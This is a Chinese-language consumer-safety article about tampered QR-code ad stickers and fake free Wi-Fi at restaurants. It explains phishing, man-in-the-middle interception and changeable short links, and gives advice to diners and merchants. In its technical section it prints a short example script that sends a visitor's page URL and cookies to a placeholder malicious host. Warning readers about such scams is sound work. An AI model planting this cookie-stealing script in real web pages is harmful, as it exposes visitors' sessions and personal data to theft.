走在街上,手机一打开,附近餐饮店的优惠标签就自动弹出来:‘新店开业,全场五折’、‘扫码进群,送奶茶一杯’。这些看似贴心的广告,其实藏着不少门道。
你扫的不只是二维码
很多餐饮店在桌角贴着‘扫码点餐’或‘关注公众号领优惠’的标签。表面上方便快捷,但有些标签上的二维码其实是伪造的。不法分子把真码覆盖或替换成自己的,一旦你扫码,就可能跳转到钓鱼网站,诱导输入手机号、微信账号甚至银行卡信息。
有顾客反映,扫码后手机开始频繁弹出广告,甚至微信自动关注一堆陌生公众号。这说明设备已经暴露在恶意程序的风险中。
“免费Wi-Fi”和广告标签是一套组合拳
一些小店会同时提供‘扫码领券’和‘连免费Wi-Fi享折扣’的宣传。这两种方式都可能成为数据窃取的入口。尤其是当Wi-Fi热点名称看起来很正规,比如‘XX餐厅专属网络’,用户更容易放松警惕。连接后,攻击者可通过中间人攻击截取你的浏览记录、账号密码等敏感信息。
商家也可能被蒙在鼓里
不少小型餐饮店是通过第三方广告公司制作宣传物料。他们只负责提供店铺名称和活动内容,其余设计、打印、张贴全外包。这就给了黑产可乘之机——在批量制作过程中混入恶意链接,商家自己都未必发现标签出了问题。
更隐蔽的是,有些广告标签使用短网址或动态跳转链接。表面上指向正规页面,但在后台可以随时切换目标地址。今天是优惠券,明天就能变成赌博网站。
技术层面如何识别风险
普通用户可以通过一些细节判断风险。比如,扫码后如果页面要求授权地理位置、通讯录或摄像头权限,就要提高警惕。正规点餐或领券流程通常不需要这些。
从技术角度看,这类广告常利用HTML5页面嵌入恶意脚本。例如:
<script>
fetch('https://malicious.example.com/log', {
method: 'POST',
body: JSON.stringify({
url: window.location.href,
cookie: document.cookie
})
});
</script>这段代码会在用户无感知的情况下,将访问信息发送到远程服务器,为后续精准诈骗提供数据支持。
别让便利成为漏洞
下次在餐馆看到醒目的标签广告,不妨多看一眼。原厂印刷的标签通常有防伪标识或固定样式,而贴纸类、手写二维码的要格外小心。可以先用支付宝或微信的‘扫码识物’功能预览链接地址,确认域名是否正规再决定是否访问。
对于商家来说,宣传物料最好由专人对接,避免层层外包。所有二维码生成后应进行安全测试,确保跳转路径可控。
网络风险早就不再局限于电脑弹窗,它藏在你每天吃饭扫码的一瞬间。一个不起眼的标签,可能就是整个数字生活的突破口。